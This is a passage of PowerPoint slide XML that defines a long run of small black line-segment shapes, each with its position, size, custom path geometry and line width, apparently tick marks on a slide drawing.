                  <a:pt x="2706" y="1767"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3534">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="object 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075846" y="5687264"/>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108" name="object 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075845" y="5684855"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="object 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103751" y="5686733"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="object 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103750" y="5683763"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="object 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2131605" y="5687799"/>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112" name="object 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2131604" y="5685897"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="object 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2159511" y="5686991"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="object 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2159510" y="5684310"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="object 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2187417" y="5686991"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="object 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2187415" y="5684310"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="object 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215269" y="5687264"/>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118" name="object 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215268" y="5684855"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="object 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243176" y="5687538"/>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120" name="object 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243175" y="5685350"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1228"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1228"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="object 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2271028" y="5686991"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="object 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2271027" y="5684310"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="object 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2298387" y="5686991"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="object 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2298386" y="5684310"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="object 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326295" y="5687264"/>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126" name="object 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326294" y="5684855"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="object 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354147" y="5686991"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="object 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354146" y="5684310"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="object 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2382052" y="5688073"/>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130" name="object 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2382051" y="5686445"/>
            <a:ext cx="0" cy="3775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1905">
                <a:moveTo>
                  <a:pt x="-2706" y="952"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="952"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="object 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409958" y="5688330"/>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132" name="object 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409957" y="5686992"/>
            <a:ext cx="0" cy="3775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1905">
                <a:moveTo>
                  <a:pt x="-2706" y="814"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="814"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="object 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437812" y="5687264"/>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134" name="object 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437811" y="5684855"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="object 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465718" y="5687264"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="object 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465717" y="5684855"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="object 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493570" y="5686733"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="object 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493569" y="5683763"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="object 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2521476" y="5686991"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="object 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2521474" y="5684310"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
